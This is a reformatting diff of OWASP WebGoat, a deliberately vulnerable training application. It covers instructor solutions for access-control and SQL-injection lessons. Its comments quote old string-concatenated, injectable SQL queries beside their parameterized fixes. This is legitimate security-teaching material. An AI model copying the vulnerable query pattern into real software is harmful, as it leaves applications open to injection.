webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/UpdateProfile_i.java

@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
 
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
 import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
@@ -13,11 +13,12 @@ import org.owasp.webgoat.session.Employee;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
+
 /**
  * Copyright (c) 2006 Free Software Foundation developed under the custody of the Open Web
- *  Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is published by OWASP
+ * Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is
- *  under the GPL. You should read and accept the LICENSE before you use, modify and/or redistribute
+ * published by OWASP under the GPL. You should read and accept the LICENSE before you use, modify
- *  this software.
+ * and/or redistribute this software.
  * 
  */
 
@@ -27,7 +28,6 @@ import org.owasp.webgoat.session.WebSession;
 /*												 */
 /*************************************************/
 
-
 public class UpdateProfile_i extends UpdateProfile
 {
 	public UpdateProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
@@ -48,7 +48,8 @@ public class UpdateProfile_i extends UpdateProfile
 						+ " personal_description = ? WHERE userid = ?;";
 				try
 				{
-					PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+					PreparedStatement ps = WebSession.getConnection(s)
+							.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
 
 					ps.setString(1, employee.getFirstName());
 					ps.setString(2, employee.getLastName());
@@ -64,15 +65,13 @@ public class UpdateProfile_i extends UpdateProfile
 					ps.setString(12, employee.getPersonalDescription());
 					ps.setInt(13, subjectId);
 					ps.execute();
-				}
+				} catch (SQLException sqle)
-				catch ( SQLException sqle )
 				{
 					s.setMessage("Error updating employee profile");
 					sqle.printStackTrace();
 				}
 
-			}
+			} catch (Exception e)
-			catch ( Exception e )
 			{
 				s.setMessage("Error updating employee profile");
 				e.printStackTrace();
@@ -84,9 +83,7 @@ public class UpdateProfile_i extends UpdateProfile
 		}
 	}
 
-
+	public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException
-	public void createEmployeeProfile(WebSession s, int userId, Employee employee)
-			throws UnauthorizedException
 	{
 		if (s.isAuthorizedInLesson(userId, RoleBasedAccessControl.UPDATEPROFILE_ACTION)) // FIX
 		{
@@ -118,14 +115,12 @@ public class UpdateProfile_i extends UpdateProfile
 					ps.setString(14, employee.getPersonalDescription());
 
 					ps.execute();
-				}
+				} catch (SQLException sqle)
-				catch ( SQLException sqle )
 				{
 					s.setMessage("Error updating employee profile");
 					sqle.printStackTrace();
 				}
-			}
+			} catch (Exception e)
-			catch ( Exception e )
 			{
 				s.setMessage("Error updating employee profile");
 				e.printStackTrace();

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/ViewProfile_i.java

@@ -1,48 +1,40 @@
+
 package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
 
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.RoleBasedAccessControl.ViewProfile;
 import org.owasp.webgoat.session.Employee;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
-/* STAGE 4 FIXES
+
-1. Find the code location where this flaw of directly retrieving the profile without data-level access control checking exists:
+/*
-	public void handleRequest( WebSession s )
+ * STAGE 4 FIXES 1. Find the code location where this flaw of directly retrieving the profile
-	{	…
+ * without data-level access control checking exists: public void handleRequest( WebSession s ) { …
-		Employee employee = getEmployeeProfile(s, userId, employeeId);
+ * Employee employee = getEmployeeProfile(s, userId, employeeId); … } public Employee
-	… }
+ * getEmployeeProfile(WebSession s, int employeeId, int subjectUserId) throws UnauthorizedException
-	public Employee getEmployeeProfile(WebSession s, int employeeId, int subjectUserId) throws UnauthorizedException {	…
+ * { … return getEmployeeProfile(s, employeeId, subjectUserId); … } 2. The solution requires a
-		return getEmployeeProfile(s, employeeId, subjectUserId);
+ * data-level access control check to ensure the user has the rights to access the data they are
-	… }
+ * requesting. a. There is a common method you can take advantage of: isAuthorizedForEmployee(s,
-2. The solution requires a data-level access control check to ensure the user has the rights to access the data they are requesting.
+ * userId, subjectUserId) Either tell the student this exists or have them look in
-	a. There is a common method you can take advantage of: 
+ * DefaultLessonAction. Note that this is not required to implement data access control but is for
-			isAuthorizedForEmployee(s, userId, subjectUserId)
+ * detection of violations. b. Uncomment the modified query retrieving the user data to have data
-		Either tell the student this exists or have them look in DefaultLessonAction.
+ * access control String query =
-		Note that this is not required to implement data access control but is for detection of violations.
+ * "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
-	b. Uncomment the modified query retrieving the user data to have data access control
+ * "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; 3. Bundle
-	 	String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+ * the entire logic with this call and throw an unauthorized exception if
-						"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;
+ * (isAuthorizedForEmployee(s, userId, subjectUserId)) { ... //String query =
-3. Bundle the entire logic with this call and throw an unauthorized exception
+ * "SELECT * FROM employee WHERE userid = " + subjectUserId; String query =
-			if (isAuthorizedForEmployee(s, userId, subjectUserId))
+ * "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
-			{	...
+ * "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; // STAGE 4
-				//String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
+ * - FIX ... } else { throw new UnauthorizedException(); } 4. Repeat stage 3 and note that the
-				String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+ * function fails with a "Not authorized" message. Adding the access check in the query is providing
-						"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;	// STAGE 4 - FIX
+ * data-level access control. The access check from isAuthorizedForEmployee is used to detect a
-				...
+ * violation. The same logic could've been applied after the query but isAuthorizedForEmployee
-			}	
+ * provides a nice centralized abstraction of that logic.
-			else
-			{
-				throw new UnauthorizedException();
-			}
-4. Repeat stage 3 and note that the function fails with a "Not authorized" message.
-Adding the access check in the query is providing data-level access control.
-The access check from isAuthorizedForEmployee is used to detect a violation.
-The same logic could've been applied after the query but isAuthorizedForEmployee provides a nice centralized abstraction of that logic. 
  */
 
 public class ViewProfile_i extends ViewProfile
@@ -52,9 +44,7 @@ public class ViewProfile_i extends ViewProfile
 		super(lesson, lessonName, actionName);
 	}
 
-	
+	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
-	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId)
-			throws UnauthorizedException
 	{
 		// Query the database to determine if the given employee is owned by the given user
 		// Query the database for the profile data of the given employee
@@ -68,7 +58,8 @@ public class ViewProfile_i extends ViewProfile
 			// Query the database for the profile data of the given employee
 			try
 			{
-				//String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;	// STAGE 4 - FIX
+				// String query = "SELECT * FROM employee WHERE userid = " + subjectUserId; // STAGE
+				// 4 - FIX
 
 				// Switch to this query to add Data Access Control
 				//
@@ -76,45 +67,40 @@ public class ViewProfile_i extends ViewProfile
 				// - qualify on ownership.employer_id to see only the current userId records
 				// - qualify on ownership.employee_id to see the current selected employee profile
 
-				String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+				String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and "
-						"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;	// STAGE 4 - FIX
+						+ "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; // STAGE
+																													// 4
+																													// -
+																													// FIX
 
 				try
 				{
-					Statement answer_statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+					Statement answer_statement = WebSession.getConnection(s)
+							.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
 					ResultSet answer_results = answer_statement.executeQuery(query);
 					if (answer_results.next())
 					{
 						// Note: Do NOT get the password field.
-						profile = new Employee(
+						profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-								answer_results.getInt("userid"),
+								answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-								answer_results.getString("first_name"),
+										.getString("title"), answer_results.getString("phone"), answer_results
-								answer_results.getString("last_name"),
+										.getString("address1"), answer_results.getString("address2"), answer_results
-								answer_results.getString("ssn"),
+										.getInt("manager"), answer_results.getString("start_date"), answer_results
-								answer_results.getString("title"),
+										.getInt("salary"), answer_results.getString("ccn"), answer_results
-								answer_results.getString("phone"),
+										.getInt("ccn_limit"), answer_results.getString("disciplined_date"),
-								answer_results.getString("address1"),
+								answer_results.getString("disciplined_notes"), answer_results
-								answer_results.getString("address2"),
+										.getString("personal_description"));
-								answer_results.getInt("manager"),
+						/*
-								answer_results.getString("start_date"),
+						 * System.out.println("Retrieved employee from db: " +
-								answer_results.getInt("salary"),
+						 * profile.getFirstName() + " " + profile.getLastName() + " (" +
-								answer_results.getString("ccn"),
+						 * profile.getId() + ")");
-								answer_results.getInt("ccn_limit"),
-								answer_results.getString("disciplined_date"),
-								answer_results.getString("disciplined_notes"),
-								answer_results.getString("personal_description"));
-/*						System.out.println("Retrieved employee from db: " + 
-								profile.getFirstName() + " " + profile.getLastName() + 
-								" (" + profile.getId() + ")");
 						 */}
-				}
+				} catch (SQLException sqle)
-				catch ( SQLException sqle )
 				{
 					s.setMessage("Error getting employee profile");
 					sqle.printStackTrace();
 				}
-			}
+			} catch (Exception e)
-			catch ( Exception e )
 			{
 				s.setMessage("Error getting employee profile");
 				e.printStackTrace();

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/SQLInjection/Login_i.java

@@ -1,33 +1,27 @@
+
 package org.owasp.webgoat.lessons.instructor.SQLInjection;
 
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
 import org.owasp.webgoat.lessons.SQLInjection.Login;
 import org.owasp.webgoat.lessons.SQLInjection.SQLInjection;
 import org.owasp.webgoat.session.WebSession;
 
+
 /*
-Solution Summary: Edit Login.java and change login().  
+ * Solution Summary: Edit Login.java and change login(). Modify login() with lines denoted by //
-                  Modify login() with lines denoted by // STAGE 2 - FIX.
+ * STAGE 2 - FIX. Solution Steps: 1. Change dynamic query to parameterized query. a. Replace the
-Solution Steps:
+ * dynamic varaibles with the "?" String query =
-1. Change dynamic query to parameterized query.
+ * "SELECT * FROM employee WHERE userid = ? and password = ?" b. Create a preparedStatement using
-   a. Replace the dynamic varaibles with the "?" 
+ * the new query PreparedStatement answer_statement =
-   		String query = "SELECT * FROM employee WHERE userid = ? and password = ?" 
+ * SQLInjection.getConnection(s).prepareStatement( query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-   			
+ * ResultSet.CONCUR_READ_ONLY ); c. Set the values of the parameterized query
-   b. Create a preparedStatement using the new query
+ * answer_statement.setString(1, userId); // STAGE 2 - FIX answer_statement.setString(2, password);
-   		PreparedStatement answer_statement = SQLInjection.getConnection(s).prepareStatement( 
+ * // STAGE 2 - FIX d. Execute the preparedStatement ResultSet answer_results =
-   				query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); 
+ * answer_statement.executeQuery();
-
-   c. Set the values of the parameterized query
-		answer_statement.setString(1, userId); // STAGE 2 - FIX
-		answer_statement.setString(2, password); // STAGE 2 - FIX
-   		
-   d. Execute the preparedStatement
-   		ResultSet answer_results = answer_statement.executeQuery();
  */
 
 public class Login_i extends Login
@@ -44,12 +38,16 @@ public class Login_i extends Login
 
 		try
 		{
-			String query = "SELECT * FROM employee WHERE userid = ? and password = ?"; // STAGE 2 - FIX
+			String query = "SELECT * FROM employee WHERE userid = ? and password = ?"; // STAGE 2 -
+																						// FIX
 
 			try
 			{
-				PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query, 
+				PreparedStatement answer_statement = WebSession.getConnection(s)
-						ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); // STAGE 2 - FIX
+						.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); // STAGE
+																													// 2
+																													// -
+																													// FIX
 				answer_statement.setString(1, userId); // STAGE 2 - FIX
 				answer_statement.setString(2, password); // STAGE 2 - FIX
 				ResultSet answer_results = answer_statement.executeQuery(); // STAGE 2 - FIX
@@ -60,14 +58,12 @@ public class Login_i extends Login
 					authenticated = true;
 				}
 
-			}
+			} catch (SQLException sqle)
-			catch ( SQLException sqle )
 			{
 				s.setMessage("Error logging in");
 				sqle.printStackTrace();
 			}
-		}
+		} catch (Exception e)
-		catch ( Exception e )
 		{
 			s.setMessage("Error logging in");
 			e.printStackTrace();

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/SQLInjection/ViewProfile_i.java

@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.instructor.SQLInjection;
 
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.SQLInjection.ViewProfile;
 import org.owasp.webgoat.session.Employee;
@@ -11,31 +11,23 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
 
+
 /*
-Solution Summary: Edit ViewProfile.java and change getEmployeeProfile().  
+ * Solution Summary: Edit ViewProfile.java and change getEmployeeProfile(). Modify
-                  Modify getEmployeeProfile() with lines denoted by // STAGE 4 - FIX.
+ * getEmployeeProfile() with lines denoted by // STAGE 4 - FIX. Solution Steps: 1. Change dynamic
-
+ * query to parameterized query. a. Replace the dynamic variables with the "?" Old: String query =
-Solution Steps:
+ * "SELECT employee.* " +
-1. Change dynamic query to parameterized query.
+ * "FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
-   a. Replace the dynamic variables with the "?" 
+ * "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; New:
-	Old: String query = "SELECT employee.* " +
+ * String query = "SELECT employee.* " +
-		"FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+ * "FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
-		"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;
+ * "ownership.employer_id = ? and ownership.employee_id = ?"; b. Create a preparedStatement using
-
+ * the new query PreparedStatement answer_statement =
-	New: String query = "SELECT employee.* " +
+ * SQLInjection.getConnection(s).prepareStatement( query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-		  "FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+ * ResultSet.CONCUR_READ_ONLY ); c. Set the values of the parameterized query
-		  "ownership.employer_id = ? and ownership.employee_id = ?";
+ * answer_statement.setInt(1, Integer.parseInt(userId)); // STAGE 4 - FIX answer_statement.setInt(2,
-   			
+ * Integer.parseInt(subjectUserId)); // STAGE 4 - FIX d. Execute the preparedStatement ResultSet
-   b. Create a preparedStatement using the new query
+ * answer_results = answer_statement.executeQuery();
-   		PreparedStatement answer_statement = SQLInjection.getConnection(s).prepareStatement( 
-   				query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); 
-
-   c. Set the values of the parameterized query
-		answer_statement.setInt(1, Integer.parseInt(userId)); // STAGE 4 - FIX
-		answer_statement.setInt(2, Integer.parseInt(subjectUserId)); // STAGE 4 - FIX
-   		
-   d. Execute the preparedStatement
-   		ResultSet answer_results = answer_statement.executeQuery();
  */
 
 public class ViewProfile_i extends ViewProfile
@@ -45,59 +37,51 @@ public class ViewProfile_i extends ViewProfile
 		super(lesson, lessonName, actionName);
 	}
 
-	public Employee getEmployeeProfile(WebSession s, String userId, String subjectUserId)
+	public Employee getEmployeeProfile(WebSession s, String userId, String subjectUserId) throws UnauthorizedException
-			throws UnauthorizedException
 	{
 		// Query the database to determine if this employee has access to this function
-		// Query the database for the profile data of the given employee if "owned" by the given user
+		// Query the database for the profile data of the given employee if "owned" by the given
+		// user
 
 		Employee profile = null;
 
 		try
 		{
-	    		String query = "SELECT employee.* " +
+			String query = "SELECT employee.* "
-			  "FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+					+ "FROM employee,ownership WHERE employee.userid = ownership.employee_id and "
-			  "ownership.employer_id = ? and ownership.employee_id = ?";
+					+ "ownership.employer_id = ? and ownership.employee_id = ?";
 
 			try
 			{
-				PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query, 
+				PreparedStatement answer_statement = WebSession.getConnection(s)
-						ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); // STAGE 4 - FIX
+						.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); // STAGE
+																													// 4
+																													// -
+																													// FIX
 				answer_statement.setInt(1, Integer.parseInt(userId)); // STAGE 4 - FIX
 				answer_statement.setInt(2, Integer.parseInt(subjectUserId)); // STAGE 4 - FIX
 				ResultSet answer_results = answer_statement.executeQuery(); // STAGE 4 - FIX
 				if (answer_results.next())
 				{
 					// Note: Do NOT get the password field.
-					profile = new Employee(
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-							answer_results.getInt("userid"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-							answer_results.getString("first_name"),
+									.getString("title"), answer_results.getString("phone"), answer_results
-							answer_results.getString("last_name"),
+									.getString("address1"), answer_results.getString("address2"), answer_results
-							answer_results.getString("ssn"),
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
-							answer_results.getString("title"),
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
-							answer_results.getString("phone"),
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-							answer_results.getString("address1"),
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
-							answer_results.getString("address2"),
+					/*
-							answer_results.getInt("manager"),
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-							answer_results.getString("start_date"),
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
-							answer_results.getInt("salary"),
-							answer_results.getString("ccn"),
-							answer_results.getInt("ccn_limit"),
-							answer_results.getString("disciplined_date"),
-							answer_results.getString("disciplined_notes"),
-							answer_results.getString("personal_description"));
-/*					System.out.println("Retrieved employee from db: " + 
-							profile.getFirstName() + " " + profile.getLastName() + 
-							" (" + profile.getId() + ")");
 					 */}
-			}
+			} catch (SQLException sqle)
-			catch ( SQLException sqle )
 			{
 				s.setMessage("Error getting employee profile");
 				sqle.printStackTrace();
 			}
-		}
+		} catch (Exception e)
-		catch ( Exception e )
 		{
 			s.setMessage("Error getting employee profile");
 			e.printStackTrace();

webgoat/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java

@@ -66,7 +66,8 @@ public class CreateDB
 		try
 		{
 			String createTableStatement = "CREATE TABLE messages (" + "num int not null," + "title varchar(50),"
-					+ "message varchar(200)," + "user_name varchar(50) not null, " + "lesson_type varchar(50) not null" + ")";
+					+ "message varchar(200)," + "user_name varchar(50) not null, " + "lesson_type varchar(50) not null"
+					+ ")";
 			statement.executeUpdate(createTableStatement);
 		} catch (SQLException e)
 		{
@@ -319,6 +320,7 @@ public class CreateDB
 
 	/**
 	 * Create users whith tans
+	 * 
 	 * @param connection
 	 * @throws SQLException
 	 */
@@ -341,7 +343,8 @@ public class CreateDB
 		{
 			String createTableStatement = "CREATE TABLE user_data_tan (" + "userid int not null,"
 					+ "first_name varchar(20)," + "last_name varchar(20)," + "cc_number varchar(30),"
-					+ "cc_type varchar(10)," + "cookie varchar(20)," + "login_count int," + "password varchar(20)" +")";
+					+ "cc_type varchar(10)," + "cookie varchar(20)," + "login_count int," + "password varchar(20)"
+					+ ")";
 			statement.executeUpdate(createTableStatement);
 		} catch (SQLException e)
 		{
@@ -361,6 +364,7 @@ public class CreateDB
 
 	/**
 	 * Create the Table for the tans
+	 * 
 	 * @param connection
 	 * @throws SQLException
 	 */
@@ -381,8 +385,8 @@ public class CreateDB
 		// Create the new table
 		try
 		{
-			String createTableStatement = "CREATE TABLE tan (" + "userid int not null,"
+			String createTableStatement = "CREATE TABLE tan (" + "userid int not null," + "tanNr int," + "tanValue int"
-					+ "tanNr int," + "tanValue int"  + ")";
+					+ ")";
 			statement.executeUpdate(createTableStatement);
 		} catch (SQLException e)
 		{
@@ -403,7 +407,6 @@ public class CreateDB
 		String insertData9 = "INSERT INTO tan VALUES (102,4,9458)";
 		String insertData10 = "INSERT INTO tan VALUES (102,5,4879)";
 
-
 		statement.executeUpdate(insertData1);
 		statement.executeUpdate(insertData2);
 		statement.executeUpdate(insertData3);

webgoat/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java

@@ -927,7 +927,8 @@ public class ParameterParser
 	// Validates format for major brands of credit card.
 	// private static final String CCNREGEX =
 	// "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([
-	// -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$";
+	//-]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4
+	// }\\1\\d{4})))$";
 	private static final String CCNREGEX = "^\\d{16}$";
 
 	private static final Pattern Ccnpattern = Pattern.compile(CCNREGEX);

webgoat/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java

@@ -456,10 +456,10 @@ public class WebSession
 		if (showCookies()) cookies = Arrays.asList(request.getCookies());
 
 		/*
-		 * List cookies = new Vector(); HttpServletRequest request = getRequest(); Cookie[] cookies =
+		 * List cookies = new Vector(); HttpServletRequest request = getRequest(); Cookie[] cookies
-		 * request.getCookies(); if ( cookies.length == 0 ) { list.addElement( new LI( "No Cookies" ) ); }
+		 * = request.getCookies(); if ( cookies.length == 0 ) { list.addElement( new LI(
-		 * for ( int i = 0; i < cookies.length; i++ ) { Cookie cookie = cookies[i];
+		 * "No Cookies" ) ); } for ( int i = 0; i < cookies.length; i++ ) { Cookie cookie =
-		 * cookies.add(cookie); //list.addElement( new LI( cookie.getName() + " -> " +
+		 * cookies[i]; cookies.add(cookie); //list.addElement( new LI( cookie.getName() + " -> " +
 		 * cookie.getValue() ) ); }
 		 */
 
@@ -1004,8 +1004,8 @@ public class WebSession
 	}
 
 	/**
-	 * @param header -
+	 * @param header
-	 *            request header value to return
+	 *            - request header value to return
 	 * @return
 	 */
 	public String getHeader(String header)

webgoat/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java

@@ -92,7 +92,8 @@ public class WebgoatContext
 		defuseOSCommands = "true".equals(getParameter(servlet, DEFUSEOSCOMMANDS));
 		enterprise = "true".equals(getParameter(servlet, ENTERPRISE));
 		codingExercises = "true".equals(getParameter(servlet, CODING_EXERCISES));
-		feedbackAddressHTML = getParameter(servlet, FEEDBACK_ADDRESS_HTML) != null ? getParameter(servlet, FEEDBACK_ADDRESS_HTML)
+		feedbackAddressHTML = getParameter(servlet, FEEDBACK_ADDRESS_HTML) != null ? getParameter(servlet,
+																									FEEDBACK_ADDRESS_HTML)
 				: feedbackAddressHTML;
 		feedbackAddress = getParameter(servlet, FEEDBACK_ADDRESS) != null ? getParameter(servlet, FEEDBACK_ADDRESS)
 				: feedbackAddress;

webgoat/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java

@@ -129,9 +129,9 @@ public class HtmlEncoder
 	 * <p>
 	 * 
 	 * e.g. <tt>"bread" & "butter"</tt> => <tt>&amp;quot;bread&amp;quot; &amp;amp;
-	 *  &amp;quot;butter&amp;quot;</tt> .
+	 *  &amp;quot;butter&amp;quot;</tt> . Update: supports nearly all HTML entities, including funky
-	 * Update: supports nearly all HTML entities, including funky accents. See the source code for
+	 * accents. See the source code for more detail. Adapted from
-	 * more detail. Adapted from http://www.purpletech.com/code/src/com/purpletech/util/Utils.java.
+	 * http://www.purpletech.com/code/src/com/purpletech/util/Utils.java.
 	 * 
 	 * @param s1
 	 *            Description of the Parameter

webgoat/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java

@@ -59,7 +59,6 @@ public class Interceptor implements Filter
 
 	/*
 	 * (non-Javadoc)
-	 * 
 	 * @see javax.servlet.Filter#destroy()
 	 */
 	public void destroy()
@@ -133,7 +132,6 @@ public class Interceptor implements Filter
 
 	/*
 	 * (non-Javadoc)
-	 * 
 	 * @see javax.servlet.Filter#init(javax.servlet.FilterConfig)
 	 */
 	public void init(FilterConfig arg0) throws ServletException